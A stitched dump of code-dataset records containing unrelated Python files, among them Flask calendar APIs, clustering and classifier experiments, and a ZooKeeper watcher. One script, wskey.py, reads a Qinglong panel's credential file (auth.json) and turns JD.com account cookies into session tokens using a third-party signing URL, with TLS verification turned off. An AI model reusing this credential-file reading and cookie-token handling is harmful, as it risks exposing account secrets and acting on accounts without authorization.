pred_label + '\\\\' + str(cnt)+'.jpg', image)\n\n \n \n\n else:\n cv2.imwrite(save_path + pred_label + '\\\\' + str(cnt)+'.jpg', image)\n ##update metadata\n np.save(save_path + 'metadata.npy', str(row_counter))\n\n tmp = 0\n for item in label_number:\n if item > 200:\n tmp += 1\n \n if tmp >= len(label_number):\n break\n\n\n\n \n \n \n\n #plt.figure('label: '+pred_label +' confidence: '+ str(conf))\n #plt.imshow(orig_im, cmap = 'gray')\n #plt.show()\n","sub_path":"auto_label_data.py","file_name":"auto_label_data.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"599062674","text":"\n\nfrom xai.brain.wordbase.adjectives._lazy import _LAZY\n\n#calss header\nclass _LAZIER(_LAZY, ):\n\tdef __init__(self,): \n\t\t_LAZY.__init__(self)\n\t\tself.name = \"LAZIER\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"lazy\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_lazier.py","file_name":"_lazier.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"139886531","text":"import frappe\nimport json\n# import shortuuid\nimport qrcode\nimport base64\nfrom PIL import Image\nfrom io import BytesIO\nfrom frappe import _\nfrom frappe.utils.data import today\nfrom frappe.utils import datetime, nowdate, add_days, flt\nfrom frappe.utils.print_format import download_pdf\nfrom datetime import date\n\n\n@frappe.whitelist()\ndef create_mobilization(doc, method):\n if doc.pending_for == 'Proposed PSL':\n frappe.errprint(doc.name)\n mobilization_id = frappe.db.get_value(\"Mobilization\", {\"candidate\": doc.name})\n # interview = frappe.db.get(\"Candidate\", docs.candidate)\n # if interview:\n # interview_date = interview.interview_date\n project = frappe.get_doc(\"Project\", doc.project)\n position = frappe.db.get_value(\"Position\", doc.position, \"subject\")\n # territory = frappe.db.get_value(\"Customer\", doc.customer, \"territory\")\n payment_terms = project.payment_terms\n if mobilization_id:\n mobilization = frappe.get_doc(\"Mobilization\", mobilization_id)\n else:\n mobilization = frappe.new_doc(\"Mobilization\")\n mobilization.update({\n \"customer\": doc.customer,\n \"territory\": territory,\n \"project\": doc.project,\n \"payment_terms\": payment_terms,\n \"position\": doc.position,\n \"candidate\": doc.name,\n \"name1\": doc.given_name,\n \"designation\": task,\n \"contact_no\": doc.mobile,\n \"current_location\": doc.current_location,\n \"passport_no\": doc.passport_no,\n \"ecr_status\": doc.ecr_status,\n \"associate_name\": doc.associate_name,\n \"associate\": doc.associate,\n \"associate_contact_no\": doc.contact_no,\n \"expiry_date\": doc.expiry_date,\n \"date_of_issue\": doc.issued_date,\n \"place_of_issue\": doc.place_of_issue,\n \"cr_executive\": project.cpc,\n \"ca_executive\": ca_executive,\n \"department\": department,\n \"source_executive\": source_executive,\n \"selection_date\": doc.interview_date,\n \"tl\": tl,\n \"degree\": doc.degree,\n \"specialization\": doc.specialization,\n \"yop\": doc.yop,\n \"basic\": doc.basic,\n \"food\": doc.food,\n \"other_allowances\": doc.other_allowances,\n \"dob\": doc.dob\n })\n \n mobilization.save(ignore_permissions=True)\n","sub_path":"apps/recruitpro/recruitpro/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"179039041","text":"\"\"\"\nEndpoints for management of calendars and events.\n\nSkylark Kraken\n(c) 2016 Coderouge\n\"\"\"\n\nimport aniso8601\n\nfrom flask import abort, Blueprint, g, jsonify, request, Response\nfrom flask.views import MethodView\n\nfrom skylark import calendars\nfrom kraken import auth\nfrom kraken.records import push_record\n\nbackend = Blueprint(\"calendars\", __name__)\n\n\nclass EventsAPI(MethodView):\n @auth.required()\n def get(self, id):\n events = calendars.get(id=id, user=g.user.name)\n if id and not events:\n abort(404)\n if isinstance(events, dict):\n return jsonify(event=events)\n else:\n return jsonify(events=events)\n\n @auth.required()\n def post(self):\n data = request.get_json()[\"event\"]\n cal = calendars.get_calendars(name=data[\"calendar\"], user=g.user.name)\n if not cal:\n abort(400)\n ev = cal.create_event(\n data[\"name\"], data[\"description\"],\n aniso8601.parse_datetime(data[\"start\"]),\n aniso8601.parse_datetime(data[\"end\"]),\n data.get(\"rrule\", \"\"), data.get(\"location\", \"\"),\n data.get(\"is_all_day\")\n )\n return jsonify(event=ev)\n\n @auth.required()\n def put(self, id):\n data = request.get_json()[\"event\"]\n cal = calendars.get_calendars(name=data[\"calendar\"], user=g.user.name)\n if not cal:\n abort(400)\n ev = cal.update_event(\n id, data[\"name\"], data[\"description\"],\n aniso8601.parse_datetime(data[\"start\"]),\n aniso8601.parse_datetime(data[\"end\"]),\n data.get(\"rrule\", \"\"), data.get(\"location\", \"\"),\n data.get(\"is_all_day\")\n )\n if not ev:\n abort(404)\n return jsonify(event=ev)\n\n @auth.required()\n def delete(self, id):\n for x in calendars.get_calendars(user=g.user.name):\n x.delete_event(id)\n return Response(status=204)\n\n\nclass CalendarsAPI(MethodView):\n @auth.required()\n def get(self, id):\n cals = calendars.get_calendars(name=id, user=g.user.name)\n if id and request.args.get(\"download\", None):\n with open(cals.path, \"r\") as f:\n data = f.read()\n resp = Response(data, mimetype=\"application/octet-stream\")\n resp.headers[\"Content-Length\"] = str(len(data.encode('utf-8')))\n aname = \"attachment; filename={0}.ics\".format(id)\n resp.headers[\"Content-Disposition\"] = aname\n return resp\n if id and not cals:\n abort(404)\n if isinstance(cals, calendars.Calendar):\n return jsonify(calendar=cals.serialized)\n else:\n return jsonify(calendars=[x.serialized for x in cals])\n\n @auth.required()\n def post(self):\n head = request.headers\n if head.get('Content-Type').startswith(\"application/json\"):\n data = request.get_json()[\"calendar\"]\n cal = calendars.Calendar(\n id=data[\"name\"], name=data[\"name\"], user=g.user.name,\n color=data.get(\"color\")\n )\n cal.create()\n elif head.get('Content-Type').startswith(\"multipart/form-data\"):\n name = request.form.get(\"name\")\n color = request.form.get(\"color\")\n cal_file = request.files.get(\"file\")\n cal = calendars.Calendar(\n id=name, name=name, user=g.user.name, color=color\n )\n cal.import_calendar(cal_file.read().decode())\n push_record(\"events\", [x for x in cal.serialized_events])\n else:\n abort(400)\n return jsonify(calendar=cal.serialized)\n\n @auth.required()\n def put(self, id):\n data = request.get_json()[\"calendar\"]\n cal = calendars.get_calendars(name=id, user=g.user.name)\n if not cal:\n abort(404)\n if data.get(\"color\") != cal.color:\n cal.set_color(data.get(\"color\"))\n return jsonify(calendar=cal.serialized)\n\n @auth.required()\n def delete(self, id):\n cal = calendars.get_calendars(name=id, user=g.user.name)\n if cal:\n cal.delete()\n return Response(status=204)\n\n\nevents_view = EventsAPI.as_view('events_api')\nbackend.add_url_rule('/api/events', defaults={'id': None},\n view_func=events_view, methods=['GET', ])\nbackend.add_url_rule('/api/events', view_func=events_view,\n methods=['POST', ])\nbackend.add_url_rule('/api/events/', view_func=events_view,\n methods=['GET', 'PUT', 'DELETE'])\n\ncals_view = CalendarsAPI.as_view('cals_api')\nbackend.add_url_rule('/api/calendars', defaults={'id': None},\n view_func=cals_view, methods=['GET', ])\nbackend.add_url_rule('/api/calendars', view_func=cals_view,\n methods=['POST', ])\nbackend.add_url_rule('/api/calendars/', view_func=cals_view,\n methods=['GET', 'PUT', 'DELETE'])\n","sub_path":"kraken/frameworks/calendars.py","file_name":"calendars.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"156010148","text":"import sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport debacl as dcl\nfrom sklearn.neighbors import KNeighborsClassifier\nX=np.genfromtxt('HDBSCANdClusterForDeBaCl_position.txt')\nn=len(X) #Number of atoms in the dataset\nY=np.genfromtxt('tempDeBaClparameters.txt')\np=int(Y[0])\nk=int(Y[1])\ngamma=int(Y[2])\n\n#gamma: Leaf nodes with fewer than this number (i.e., prune_threshold or \n# gamma)of members are recursively merged into larger nodes. \n# If 'None' (the default), then no pruning is performed.\n\nknn_graph, radii = dcl.utils.knn_graph(X, k, method='kd-tree')\ndensity = dcl.utils.knn_density(radii, n, p, k)\n\n#num_level: Number of density levels in the constructed tree.\n#If None (default), num_levels is internally set to be the number of rows in X\n#verbose: if True, a progress indicator is printed at every 100th leevl of tree construction\ntree = dcl.construct_tree_from_graph(knn_graph, density, prune_threshold=gamma,\n verbose=False)\ndef out_fun():\n return str(tree)\noutput = out_fun()\nfile = open(\"DeBaClTempOutputs/DeBaCl_treeOutput.txt\",\"w\")\nfile.write(output)\nfile.close()\n\nnp.savetxt('DeBaClTempOutputs/DeBaCl_density.txt',tree.density)\n\n#when fill_background is True, it means that\n#the label of noise points is considered as -1\nlabels = tree.get_clusters(fill_background=True)\n#The first column is the row number of the dataset(i.e., x,y,z of the atoms)\n#The second column is the label of cluster for each atom.\nnp.savetxt('DeBaClTempOutputs/DeBaCl_labels.txt',labels,fmt='%d %d')\n\nleaves = tree.get_leaf_nodes()\nlabels = tree.get_clusters()\nfig = tree.plot(form='mass', color_nodes=leaves, colormap=plt.cm.jet)[0]\n#fig.show()\nfig.savefig('DeBaClTempOutputs/DeBaCl_plot.png',dpi=(300))\n","sub_path":"Cluster analysis code/For PC/debaclImanSecond.py","file_name":"debaclImanSecond.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"611571718","text":"#! Libraries\n\nfrom sklearn.datasets import load_iris\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.cluster import KMeans\nfrom sklearn import metrics\nfrom sklearn.tree import export_graphviz\n\nimport pandas as pd\n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nfrom subprocess import call\n\nfrom IPython.display import Image\n\nimport pydot\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom tqdm import tqdm\n\nimport statistics as st\n\n#! Data\n\n#* Loading dataset\niris =load_iris()\n\n#* Converting dataset to pandas dataframe\ndf = pd.DataFrame(iris.data, columns=iris.feature_names)\n\n#* Adding species column to dataframe\ndf['species']=pd.Categorical.from_codes(iris.target,iris.target_names)\n\n#* Removing rows with virginica value\ndf=df[df.species != 'virginica']\n\n#* Removing width columns from dataframe\ndf=df.drop('sepal width (cm)', axis=1)\ndf=df.drop('petal width (cm)', axis=1)\n\n#* Reseting index and mixing dataframe\ndf = df.sample(frac=1).reset_index(drop=True)\n\n#* Extracting data from the dataframe\nx, y=df.iloc[:,0].values, df.iloc[:,1].values\nx,y=x.reshape(len(x),1), y.reshape(len(y),1)\n\n#* Organizing data in an array\ndata=np.zeros([len(x),2])\ndata[:len(x),0]=x[:,0]\ndata[:len(x),1]=y[:,0]\n\n#! K - Means\n\n#! Elbow curve\n\n#* Evualating Kmeans with different number of clusters\nkmeans = [KMeans(n_clusters=i) for i in range(1, 5)]\n\n#* Obtaining its value and stacking in a list\nscore = [kmeans[i].fit(data).score(data) for i in range(len(kmeans))]\n\n#* Model implementation with the number of cluster determinated with the curve\nkm=KMeans(n_clusters=2)\noutput_km = km.fit_predict(data)\n\n#* Copying data frame for maintain primary data saved\ncompare=df.copy()\n\n#* Assigning labels to results \noutput_km_label=['setosa' if output_km[i] == 0 else 'versicolor' for i in range(len(output_km))]\n\nif not df.species[0] == output_km_label[0]:\n output_km_label=['versicolor' if output_km[i] == 0 else 'setosa' for i in range(len(output_km))]\n # This IF sentence is important because k-means is an unsupervised learning algorithm, so it didn't really knows if the label is right\n\n#* Stacking a column with K-Means result\ncompare['Cluster']=output_km_label\n\naccuracy=metrics.adjusted_rand_score(compare.iloc[:,2].values,output_km)\n\n\n#! Random Forest\n\n#* Creating Test and Train data\ncompare['is_train']=np.random.uniform(0,1,len(compare))<=.75\n # We are creating a random number between 0 and 1 for each row, if that number is less tan 0.75 will be true, then the 75% of data will be selected for train.\n\n#* Creating dataframes with test rows and training rows\ntrain,test = compare[compare['is_train']==True],compare[compare['is_train']==False]\n\n#* Deleting the column to keep the dataframe unchanged\ncompare = compare.drop('is_train', 1)\n\n#! Model \n\n#* Creating a random forest classifier\nclf=RandomForestClassifier(n_estimators=100,n_jobs=2,random_state=0)\n\n#* Selecting features\nfeatures = compare.columns[:2]\n\n#* Training the classifier\nclf.fit(train[features],pd.factorize(train['species'])[0])\n\n#* Applying the trained Classifier to the test\noutput_RF_t=iris.target_names[clf.predict(test[features])]\n\n#* Confussion matrix\npd.crosstab(test['species'],output_RF_t,rownames=['Actual Species'],colnames=['Predicted Species'])\n\n#* Adding column with random forest results\ncompare['RandForest']=iris.target_names[clf.predict(compare[features])]\n\n#* Getting estimator for the graph \nestimator = clf.estimators_[5]\n\n\n#* Export as dot file\nexport_graphviz(estimator, out_file='tree.dot', \n feature_names = [iris.feature_names[0],iris.feature_names[2]],\n class_names = iris.target_names[:2],\n rounded = True, proportion = False, \n precision = 2, filled = True)\n\n(graph,) = pydot.graph_from_dot_file('tree.dot')\ngraph.write_png('tree.png')\n\n#* Display in jupyter notebook\nimg = mpimg.imread('tree.png')\n\noutput_RF=(pd.factorize(compare['RandForest']))[0]\n\n\n\n#! Logistic Regression\n\n#! Data\n\n#* Samples number\nn=len(data)\n#* Labels\nh=n//2\ndimen=2\n\n#* Splitting the data in inputs (x) and outputs (y)\nx=torch.from_numpy(data).float().requires_grad_(True)\ny=(torch.from_numpy((pd.factorize(df['species']))[0]).view(len(data),1)).float()\n\n#! Model\n\n#* Building the model\nmodel= nn.Sequential(nn.Linear(2,1), nn.Sigmoid())\n\n#* Loss function and optimizer method\nloss_function= nn.BCELoss()\noptimizer=optim.Adam(model.parameters(),lr=0.025)\n\n#! Training loop\n\nlosses=[]\niterations=400\n\nfor i in tqdm(range(iterations)):\n \n result=model(x)\n loss=loss_function(result,y)\n \n losses.append(loss.data)\n\n optimizer.zero_grad()\n \n loss.backward()\n \n optimizer.step()\n\n#* Passing data through the model\nprediction=model(x)\n\n#* List with the corresponding labels\nprediction=['purple' if prediction[i] < 0.5 else 'yellow' for i in range(len(prediction))]\n\n#* weights\nw = list(model.parameters())\n\nw0 = w[0].data.numpy()\n\n#! Visualization\n\n#* Parameters to plot the line\nx_axis = np.linspace(np.min(data[:,0]), np.max(data[:,0]), len(x))\ny_axis = -(w[1].data.numpy() + x_axis*w0[0][0]) / w0[0][1]\n \n#* Font format \nfont = {'family': 'serif',\n 'color': 'darkred',\n 'weight': 'normal',\n 'size': 8,\n }\n\n#! FINAL PLOTTING\n\n#* Plotting\nfig, axs = plt.subplots(2,4, constrained_layout=True)\nfig.suptitle('Comparing classification methods', fontsize=30)\nfig.set_size_inches(16, 8)\n\naxs[0][0].scatter(data[:,0],data[:,1],c='green',alpha=0.6,s=65)\naxs[0][0].set_title('Dataset')\n\naxs[0][1].scatter(data[:,0],data[:,1],alpha=0.6,s=65,c=pd.factorize(df['species'])[0])\naxs[0][1].set_title('Dataset wiht outputs')\n\n\naxs[0][2].plot(range(1, 5),score)\naxs[0][2].set_xlabel('Number of Clusters')\naxs[0][2].set_ylabel('Score')\naxs[0][2].set_title('Elbow Curve')\n\naxs[0][3].scatter(data[:,0],data[:,1],c=output_km,alpha=0.6,s=65)\naxs[0][3].scatter([km.cluster_centers_[0][0],km.cluster_centers_[1][0]],[km.cluster_centers_[0][1],km.cluster_centers_[1][1]],marker=\"X\",s=150,c='red')\naxs[0][3].set_title('K means')\n\naxs[1][0].imshow(img)\naxs[1][0].set_title('Random Forest')\naxs[1][0].axis('off')\n\naxs[1][1].scatter(data[:,0],data[:,1],c=output_RF,alpha=0.6,s=65)\naxs[1][1].set_title('Random Forest Classifier')\n\naxs[1][2].plot(range(iterations),losses)\naxs[1][2].set_title('Loss')\n\naxs[1][3].plot(x_axis, y_axis,'g--') \nfor i in range(len(x)):\n axs[1][3].scatter(x[i,0].data, x[i,1].data,s=55,alpha=0.7,c=prediction[i])\naxs[1][3].set_title('Logistic Regression')\n\nplt.show()","sub_path":"Classifiers/05-ComparedClassifiers.py","file_name":"05-ComparedClassifiers.py","file_ext":"py","file_size_in_byte":6550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"270257446","text":"import time\nfrom kazoo.client import KazooClient\nfrom kazoo.client import KazooState\n\n\ndef my_listener(state):\n if state == KazooState.LOST:\n # Register somewhere that the session was lost\n print('zhr test: lost')\n elif state == KazooState.SUSPENDED:\n # Handle being disconnected from Zookeeper\n print('zhr test: suspended')\n else:\n # Handle being connected/reconnected to Zookeeper\n print('zhr test: connected/reconnected')\n\n\nif __name__ == '__main__':\n zk = KazooClient(hosts='localhost:2181')\n zk.add_listener(my_listener)\n zk.start()\n\n @zk.ChildrenWatch('/my/favorite/node')\n def watch_children(children):\n print('Children are now: %s' % children)\n\n @zk.DataWatch('/my/favorite/node')\n def watch_node(data, stat):\n print(data)\n print(stat)\n print('Version: %s, data: %s' % (stat.version, data.decode('utf-8')))\n\n def my_func(event):\n print('in my_func')\n print(event)\n node_type = event.type\n state = event.state\n print('type: {}, state: {}'.format(node_type, state))\n path = event.path\n print(zk.get(path))\n\n node = zk.get('/my/favorite/node', watch=my_func)\n children = zk.get_children('/my/favorite/node', watch=my_func)\n\n while True:\n time.sleep(1)\n","sub_path":"python/third_part_tools/kazoo/test/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"313786202","text":"import partikkel\nimport matplotlib.pyplot as plt\n\nm_e = 9.11E-31\nhbar = 1.055E-34\nk0 = 1.0E8\nV0 = 3*hbar**2 * k0**2 / m_e\ndx = 1.0E-10\nsigma = 100*dx\n\np1 = partikkel.Partikkel(m_e, k0, dx, 0, 400, sigma, x_offset=0)\np1.calculate(1.0E-13, 900)\n\nplt.figure(1)\nplt.title(r\"Usikkerhet i posisjon\")\n","sub_path":"oppg1.py","file_name":"oppg1.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"586870191","text":"# 在这里输入青龙面板用户名密码,如果不填写,就自动从auth.json中读取\nusername = \"\"\npassword = \"\"\n\nimport requests\nimport time\nimport json\nimport re\nfrom urllib.parse import urlencode\n\nrequests.packages.urllib3.disable_warnings()\n\ntoken = \"\"\nif username == \"\" or password == \"\":\n f = open(\"/ql/config/auth.json\")\n auth = f.read()\n auth = json.loads(auth)\n username = auth[\"username\"]\n password = auth[\"password\"]\n token = auth[\"token\"]\n f.close()\n\n\ndef gettimestamp():\n return str(int(time.time() * 1000))\n\n\ndef login(username, password):\n url = \"http://127.0.0.1:5700/api/login?t=%s\" % gettimestamp()\n data = {\"username\": username, \"password\": password}\n r = s.post(url, data)\n s.headers.update({\"authorization\": \"Bearer \" + json.loads(r.text)[\"data\"][\"token\"]})\n\n\ndef getitem(searchValue):\n url = \"http://127.0.0.1:5700/api/envs?searchValue=%s&t=%s\" % (searchValue, gettimestamp())\n r = s.get(url)\n item = json.loads(r.text)[\"data\"]\n return item\n\n\ndef getckitem(searchValue, value):\n url = \"http://127.0.0.1:5700/api/envs?searchValue=%s&t=%s\" % (searchValue, gettimestamp())\n r = s.get(url)\n for i in json.loads(r.text)[\"data\"]:\n if value in i[\"value\"]:\n return i\n return []\n\n\ndef getsign():\n url = \"https://hellodns.coding.net/p/sign/d/jsign/git/raw/master/sign\"\n r = s.get(url, verify=False)\n data = \"&uuid=\" + json.loads(r.text)[\"uuid\"] + \"&st=\" + json.loads(r.text)[\"st\"] + \"&sign=\" + json.loads(r.text)[\"sign\"] + \"&sv=\" + json.loads(r.text)[\"sv\"]\n return data\n\n\ndef wstopt(cookies):\n headers = {\n 'user-agent': 'okhttp/3.12.1;jdmall;android;version/;build/0;screen/1080x1920;os/5.1.1;network/wifi;',\n 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'Cookie': cookies,\n }\n url = 'https://api.m.jd.com/client.action?functionId=genToken&clientVersion=10.1.2&build=89743&client=android&d_brand=OPPO&d_model=PCRT00&osVersion=5.1.1&screen=1920*1080&partner=lc023&oaid=&eid=eidAe81b812187s36z8QOkxpRJWzMceSvZJ6Ges/EbXnbK3TBxc/JEcutXxuELIRMJDVeTNJFcAF/+tx1qw9GllLTdSnFeV3ic6909a697SbDL9zxEc4&sdkVersion=22&lang=zh_CN&aid=21e9fa9db1e4e15d&area=19_1601_3633_63257&networkType=wifi&wifiBssid=unknown&uts=0f31TVRjBSsqndu4%2FjgUPz6uymy50MQJw%2B3mGtYmx2hY8nVZkXFqGJ2D3wO8rvc%2BnAbe881zrDZjz3yU3z8vQgL8NZ7e39M3H2YpLER13q%2B3VUzHQXXLg4BMmeH%2B1W0%2BxQY%2FL%2FR4Y58JMW9A9F9yD2BtQPynkeKYtBsYDCkOn35Tv9ci57mPbqxYWU0TDVJ8t7JBXRhLckTorzxtEAVucA%3D%3D&uemps=0-0&harmonyOs=0' + getsign()\n body = 'body=%7B%22action%22%3A%22to%22%2C%22to%22%3A%22https%253A%252F%252Fplogin.m.jd.com%252Fcgi-bin%252Fm%252Fthirdapp_auth_page%253Ftoken%253DAAEAIEijIw6wxF2s3bNKF0bmGsI8xfw6hkQT6Ui2QVP7z1Xg%2526client_type%253Dandroid%2526appid%253D879%2526appup_type%253D1%22%7D&'\n response = requests.post(url, data=body, headers=headers, verify=False)\n data = json.loads(response.text)\n if data.get('code') != '0':\n return None\n tokenKey = data.get('tokenKey')\n url = data.get('url')\n session = requests.session()\n params = {\n 'tokenKey': tokenKey,\n 'to': 'https://plogin.m.jd.com/jd-mlogin/static/html/appjmp_blank.html'\n }\n url += '?' + urlencode(params)\n session.get(url, allow_redirects=True)\n result = \"\"\n for k, v in cookies.items():\n if k == 'pt_key' or k == 'pt_pin':\n result += k + \"=\" + v + \"; \"\n if result[0:15] == 'pt_key=app_open':\n return result\n else:\n return 'error'\n\n\ndef checkcookie(cookies):\n url = 'https://api.m.jd.com/client.action?functionId=newUserInfo&clientVersion=10.0.9&client=android&openudid=a27b83d3d1dba1cc&uuid=a27b83d3d1dba1cc&aid=a27b83d3d1dba1cc&area=19_1601_36953_50397&st=1626848394828&sign=447ffd52c08f0c8cca47ebce71579283&sv=101&body=%7B%22flag%22%3A%22nickname%22%2C%22fromSource%22%3A1%2C%22sourceLevel%22%3A1%7D&'\n headers = {\n 'user-agent': 'okhttp/3.12.1;jdmall;android;version/;build/0;screen/1080x1920;os/5.1.1;network/wifi;',\n 'Cookie': cookies,\n }\n response = requests.post(url=url, headers=headers, verify=False)\n data = response.json()\n if data['code'] == '0':\n return False\n else:\n return True\n\n\ndef update(text, qlid):\n url = \"http://127.0.0.1:5700/api/envs?t=%s\" % gettimestamp()\n s.headers.update({\"Content-Type\": \"application/json;charset=UTF-8\"})\n data = {\n \"name\": \"JD_COOKIE\",\n \"value\": text,\n \"_id\": qlid\n }\n r = s.put(url, data=json.dumps(data))\n if json.loads(r.text)[\"code\"] == 200:\n return True\n else:\n return False\n\n\ndef insert(text):\n url = \"http://127.0.0.1:5700/api/envs?t=%s\" % gettimestamp()\n s.headers.update({\"Content-Type\": \"application/json;charset=UTF-8\"})\n data = []\n data_json = {\n \"value\": text,\n \"name\": \"JD_COOKIE\"\n }\n data.append(data_json)\n r = s.post(url, json.dumps(data))\n if json.loads(r.text)[\"code\"] == 200:\n return True\n else:\n return False\n\n\nif __name__ == '__main__':\n s = requests.session()\n if token == \"\":\n login(username, password)\n else:\n s.headers.update({\"authorization\": \"Bearer \" + token})\n count = 0\n wskeys = getitem(\"JD_WSCK\")\n for i in wskeys:\n count += 1\n wspin = re.findall(r\"pin=(.*?);\", i[\"value\"])[0]\n if i[\"status\"] == 0:\n item = getckitem(\"JD_COOKIE\", \"pt_pin=\" + wspin)\n if item != []:\n if checkcookie(item[\"value\"]):\n ptck = wstopt(i[\"value\"])\n if ptck == \"error\":\n print(\"第%s个wskey转换失败, pin:%s\" % (count, wspin))\n else:\n if update(ptck, item[\"_id\"]):\n print(\"第%s个wskey更新成功, pin:%s\" % (count, wspin))\n else:\n print(\"第%s个wskey更新失败, pin:%s\" % (count, wspin))\n else:\n print(\"第%s个wskey无需更新, pin:%s\" % (count, wspin))\n else:\n ptck = wstopt(i[\"value\"])\n if ptck == \"error\":\n print(\"第%s个wskey转换失败, pin:%s\" % (count, wspin))\n else:\n if insert(ptck):\n print(\"第%s个wskey添加成功, pin:%s\" % (count, wspin))\n else:\n print(\"第%s个wskey添加失败, pin:%s\" % (count, wspin))\n else:\n print(\"第%s个wskey已禁用, pin:%s\" % (count, wspin))\n","sub_path":"wskey.py","file_name":"wskey.py","file_ext":"py","file_size_in_byte":6580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"115396501","text":"\nimport argparse\n\n\nimport cmdline_plot\nimport cmdline_plotraster\nimport cmdline_compare\n\n\n\n\ndef build_argparser():\n\n parser = argparse.ArgumentParser(description='HDF-jive command-line tools')\n subparsers = parser.add_subparsers(help='sub-command help')\n cmdline_plot.build_subparser(subparsers)\n cmdline_plotraster.build_subparser(subparsers)\n cmdline_compare.build_subparser(subparsers)\n return parser\n\n\ndef main():\n parser = build_argparser()\n args = parser.parse_args()\n\n # Run the subcommand:\n args.func(args)\n \n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/src/hdfjive/cmdline/cmdline.py","file_name":"cmdline.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"644556560","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 25 12:25:29 2018\n\n@author: sahith\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport math\nfrom sklearn.metrics import adjusted_rand_score\nfrom sklearn.metrics import fowlkes_mallows_score\n\n\ndef logLikelihood(data, mean, covariance, lambda1, k, m): # Log Likelihood \n\n log = 0\n for i in range(len(data)):\n sum1 = 0\n for j in range(k):\n sum1 += lambda1[j] * guassian(data[i], mean[j], covariance[j], m)\n log += np.log(sum1)\n return log\n\ndef gmmPred(data, mean, covariance, lambda1, k, m):\n pred = []\n for i in range(len(data)):\n best_likelihood = None\n best_cluster = None\n for j in range(k):\n likelihood = lambda1[j] * guassian(data[i], mean[j], covariance[j], m)\n if best_likelihood is None or best_likelihood <= likelihood:\n best_likelihood = likelihood\n best_cluster = j\n pred.append(best_cluster)\n return pred\n\ndef preprocessData(data): #Preprocessing Data\n rows, cols = data.shape\n for i in range(cols):\n mean = np.mean(data[:, i])\n std = np.std(data[:, i])\n data[:, i] = (data[:, i]-mean)/std\n return data\n\ndef guassian(row, mean, covariance, m): # Multivariate Gaussian\n diff_data_mean = np.array(row - mean).reshape(1, m)\n exp = np.exp(-0.5 * np.dot(np.dot(diff_data_mean, np.linalg.inv(covariance)), diff_data_mean.T))\n return (1 / np.sqrt(((2 * math.pi) ** m) * np.linalg.det(covariance))) * exp\n\n\ntrain_data = np.array(pd.read_csv('leaf.data',header = None)) #Train data\ntrainLength = len(train_data)\ntrain_features = train_data[:, 0]\ntrain_data = train_data[:, 1:]\ncols = len(train_data[0])\nscaledData = preprocessData(train_data) #Scaling data\n\nkArray = [12, 18, 24, 36, 42] # K array\n\n# Get GMM objective loss array and compute mean and variance\nlossArray = []\n\nmeanArray = []\ncovarianceArray = []\nlambdaArray = []\n# For each K\nfor k in kArray:\n print('K-value',k)\n for i in range(20): #20 random Intializations\n print(\"Iter\",i)\n centers = np.empty((k, cols), dtype=np.float64)\n for j in range(k):\n centers[j] = np.array(np.random.choice(np.arange(-3, 4, 1), cols)).reshape(1, cols)\n cov_matrix_arr = np.empty((k, cols, cols))\n for j in range(k):\n cov_matrix_arr[j] = np.identity(n=cols, dtype=np.float64)\n\n lambda_arr = np.empty((k, 1), dtype=np.float64)\n for j in range(k):\n lambda_arr[j] = 1/k\n\n logLikelihoodVal = logLikelihood(scaledData, centers, cov_matrix_arr, lambda_arr, k, cols)\n iteration_counter = 1\n while True:\n #E Step\n q_array = np.empty((trainLength, k), dtype=np.float64)\n for x in range(trainLength):\n den_sum = 0\n for k_val in range(k):\n q_array[x, k_val] = lambda_arr[k_val] * guassian(scaledData[x], centers[k_val], cov_matrix_arr[k_val], cols)\n den_sum += q_array[x, k_val]\n\n q_array[x] = q_array[x] / den_sum\n #M Step\n for k_val in range(k):\n num_total = 0\n den_total = 0\n for m in range(trainLength):\n num_total += q_array[m, k_val] * scaledData[m]\n den_total += q_array[m, k_val]\n centers[k_val] = num_total / den_total\n\n for k_val in range(k):\n num_total = 0.0\n den_total = 0.0\n\n for m in range(trainLength):\n diff_vector = scaledData[m] - centers[k_val]\n diff_vector = np.array(diff_vector).reshape((1, cols))\n num_total += q_array[m, k_val] * np.dot(diff_vector.T, diff_vector)\n den_total += q_array[m, k_val]\n cov_matrix_arr[k_val] = num_total / den_total\n cov_matrix_arr[k_val] += np.identity(n=cols)\n\n for k_val in range(k):\n num_total = 0\n for m in range(trainLength):\n num_total += q_array[m, k_val]\n\n lambda_arr[k_val] = num_total / trainLength\n\n prevLog = logLikelihoodVal\n logLikelihoodVal = logLikelihood(scaledData, centers, cov_matrix_arr, lambda_arr, k, cols)\n if prevLog >= logLikelihoodVal: # Convergence Check\n lossArray.append(logLikelihoodVal)\n meanArray.append(centers)\n covarianceArray.append(cov_matrix_arr)\n lambdaArray.append(lambda_arr)\n break\n\nindex = 0 